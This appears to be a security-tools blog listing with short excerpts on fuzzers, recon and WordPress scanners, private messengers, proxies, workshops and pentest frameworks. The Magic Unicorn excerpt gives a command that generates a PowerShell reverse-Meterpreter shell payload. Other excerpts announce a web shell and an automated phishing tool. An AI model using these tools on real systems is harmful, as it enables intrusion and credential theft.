zzuf is a transparent application input fuzzer. Its purpose is to find bugs in applications by corrupting their user-contributed data (which more often than not comes from untrusted sources on the Internet). It works by intercepting file and network operations and changing random bits in the program’s input. zzuf’s behaviour is deterministic, making it easier to reproduce bugs. Its main areas of use are:
- quality assurance: use zzuf to test existing software, or integrate it into your own software’s test suite
- security: very often, segmentation faults or memory corruption issues mean a potential security hole; zzuf helps expose some of them
- code coverage analysis: use zzuf to maximise code coverage
zzuf’s primary target is media players, image viewers and web browsers, because the data they process is inherently insecure, but it was also successfully used to find bugs in system utilities such as objdump.
zzuf is not rocket science: the idea of fuzzing input data is hardly new, but zzuf’s main purpose is to make things easier and automated.
Documentation
The zzuf tutorial is a hands-on guide to the most important zzuf features. It starts with the working principles but goes on with very advanced uses of the tool.
Warning: this tutorial requires zzuf version 0.11 or later.
Basic zzuf usage
1.1. Launching zzuf
1.2. Invoking different programs
1.3. The fuzzing ratio
1.4. The random seed
1.5. Creating fuzzed [...]
Great for getting an initial footprint of your targets and discovering additional subdomains. InstaRecon will do:
- DNS (direct, PTR, MX, NS) lookups
- Whois (domains and IP) lookups
- Google dorks in search of subdomains
- Shodan lookups
- Reverse DNS lookups on entire CIDRs
…all printed nicely on your console or csv file.
InstaRecon will never scan a target directly. Information is retrieved from DNS/Whois servers, Google, and Shodan.
Installing with pip
Simply install the dependencies using pip. Tested on Ubuntu 14.04 and Kali Linux 1.1.0a.
pip install -r requirements.txt
or
pip install pythonwhois ipwhois ipaddress shodan
Example
$ ./instarecon.py -s <shodan_key> -o ~/Desktop/github.com.csv github.com
# InstaRecon v0.1 - by Luis Teixeira (teix.co)
# Scanning 1/1 hosts
# Shodan key provided - <shodan_key>
Source && Download
Plecost is a vulnerability fingerprinting and vulnerability finder for the WordPress blog engine.
There are a huge number of WordPress installations around the world. Many of them are exposed to attack and can be turned into a virus, malware or illegal porn provider without the blog owner’s knowledge.
This project tries to help sysadmins and blog owners make their WordPress installations a bit more secure.
Installing Plecost is easy:
$ python3 -m pip install plecost
Remember that Plecost3 only runs in Python 3.
Scanning a web site is just as simple:
$ plecost http://SITE.com
A slightly more complex scan: increasing verbosity and exporting the results in JSON or XML format:
JSON:
$ plecost -v http://SITE.com -o results.json
XML:
$ plecost -v http://SITE.com -o results.xml
Advanced scan options
Don’t check the WordPress version, only scan for plugins:
$ plecost -nc http://SITE.com
Force the scan, even if WordPress was not detected:
$ plecost -f http://SITE.com
Display only the short banner:
$ plecost -nb http://SITE.com
List available wordlists:
$ plecost -nb -l
// Plecost - WordPress finger printer Tool - v1.0.0
Available word lists:
1 - plugin_list_10.txt
2 - plugin_list_100.txt
3 - plugin_list_1000.txt
4 - plugin_list_250.txt
5 - plugin_list_50.txt
6 - [...]
BitTorrent’s peer-to-peer private voice and text app Bleep is finally available for curious Windows, Mac, iOS and Android users to test out.
The app offers end-to-end encryption of all communication (calls are connected directly), and you don’t have to pay to use it. You also don’t have to provide any information about yourself in order to use it – a random nickname is enough, and a Bleep key will be created to identify the device for other users to be able to contact you. Bleep got its name from the fact that the company does not see the metadata or the contents of the exchanged messages.
Unlike traditional messaging services, where a chat app establishes a Session Initiation Protocol (SIP) connection with a central server app, Bleep does the same with a distributed server app.
This means that there is no central repository of metadata – not because the company does not store it, but because they never have it. It also means that the person who wants to talk with someone must go search for them through nodes (and this search is also not tracked).
There are two main components to its architecture:
New peer-to-peer platform for communications; think of it as a fully distributed SIP (Session Initiation Protocol) server which [...]
Anonymous metadata-resistant instant messaging that just works
Ricochet is an experiment with a different kind of instant messaging that doesn’t trust anyone with your identity, your contact list, or your communications.
- You can chat without exposing your identity (or IP address) to anyone
- Nobody can discover who your contacts are or when you talk (metadata-free!)
- There are no servers or operators to compromise that could access your information
- It’s cross-platform and easy for non-technical users
How it works
Ricochet is a peer-to-peer instant messaging system built on Tor hidden services. Your login is your hidden service address, and contacts connect to you (not an intermediate server) through Tor. The rendezvous system makes it extremely hard for anyone to learn your identity from your address.
Ricochet is not affiliated with or endorsed by The Tor Project
Technical design of Ricochet
Ricochet is an instant messaging system designed around Tor hidden services. This document describes the goals and design of that system from a technical perspective. The reader should be familiar with Tor and hidden services.
Goals for the project
To implement a real-time messaging system with these properties:
- Users aren’t personally identifiable by contacts or their [...]
Advanced Web Shell: DAws – 22/5/2015 – Release
Source && Download
proxenet is a multi-threaded proxy which allows you to manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages and more can be added easily. proxenet is a C-based proxy which allows you to interact with higher level languages and perform on-the-fly modification of requests/responses sent by your Web browser.
proxenet is neither script-kiddie friendly nor GUI friendly.
If this is what you are looking for, here are a few links for you: ZAP, Burp, ProxyStrike
Or, the best way, write your own GUI as a proxenet plugin!
Why use a DIY Web Proxy?
The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few proxies support adding (or extending proxy capabilities with) new extensions. When they do support scripting, they usually support only a limited set of languages, and in many cases only one – despite Burp’s persistent attempts to make unnatural bindings (Python over Java or, worse, Ruby over Java).
Being written in pure C, proxenet is very fast, efficient and easily pluggable into anything else. It is THE ultimate DIY web proxy for pentesters.
Features:
- Written in C
- Fast (heavy thread [...]
The Kentuckiana ISSA Chapter is hosting its 3rd annual information security workshop. This event is available for a donation to a great cause. The class will benefit Johnny Long and his family in their mission to support Hackers for Charity full-time in Uganda, Africa. Hackers for Charity is a non-profit organization that leverages the skills of technologists to solve technology challenges for various non-profits and provide food, equipment, job training and computer education to the world’s poorest citizens.
Topics
- Password Hash Usage
- Capturing Passwords with Cain, Metasploit and other tools
- Cracking Password Hashes with John the Ripper and Hashcat
- Other Topics
Martin “Pure Hate” Bos (@purehate_) works as a penetration tester for Accuvant Inc., is a globally recognized leader in password analysis and is a core developer of Backtrack and Kali Linux. Additionally he is a co-founder of Question-Defense.com, a website dedicated to answering technical questions daily with the largest online WPA cracking service on the web, and one of the founders of DerbyCon, a hacker con located in Louisville, Kentucky. He resides in Louisville, KY with his wife, Kim, and their daughter.
Adrian “Irongeek” Crenshaw (@irongeek_adc) has worked in the IT industry for the last seventeen years. He runs the information [...]
The challenges with cyber security, and cyber warfare in particular, are complicated by the attributes of a cyber “battlespace”. The data sets that represent the values of speed, size and complexity of the cyber landscape are far beyond the capability of human beings to comprehend in a working environment. As the velocity, variety and volume of cyber data increase, the ability of humans to effectively process situational awareness, impacts, tactics and actions will effectively decrease. Many of the current tools for cyber security present ridiculous cognitive load issues for the users and inhibit thinking (even if the additional load is subconscious) and decision-making. This presentation posits that a specialized variant of user-centered design that focuses on augmenting human performance in data-intensive domains will be critical for cyber security professionals. The process and necessity of user-centered design to enable system-supported decision making (also called decision advantage) will be discussed, as well as examples of industries successfully solving the problem from the multi-player gaming, design thinking and data sciences fields.
Phishing is one of the few attack vectors that has become more prevalent over time. This presentation will explore common phishing attack tools and techniques. Additionally, we will be demoing a new tool which will assist penetration testers in quickly deploying phishing exercises in minimal time. The tool, when provided minimal input (just a domain name), can automatically search for potential targets, deploy multiple phishing websites, craft and send phishing emails to the targets, record the results, and generate a report. It will work in a stand-alone fashion or make use of external tools (such as theHarvester, Recon-NG, SET, and Metasploit) if available.
Magic Unicorn is a simple tool for using a PowerShell downgrade attack to inject shellcode straight into memory. It is based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Usage is simple: just run Magic Unicorn (ensure Metasploit is installed and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you simply cut and paste into a command-line window or deliver through a payload delivery system.
root@bt:~/Desktop# python unicorn.py
Unicorn is a PowerShell injection tool utilizing Matthew Graeber’s attack, expanded to automatically downgrade the process if a 64-bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
Usage: python unicorn.py payload reverse_ipaddr port
Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a [...]
The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for penetration testing. As pentesters, we’ve become accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those “go to” tools that we use on a regular basis, and using the latest and greatest is important.
PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is consistent with the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add to it as you see fit. We commonly see internally developed repos that you can use as part of this framework as well. It’s all up to you.
The ultimate goal is community support for this project. We want new tools added to the GitHub repository. Submit your modules. It’s super simple to configure and add them, and it only takes a few minutes.
First check out the [...]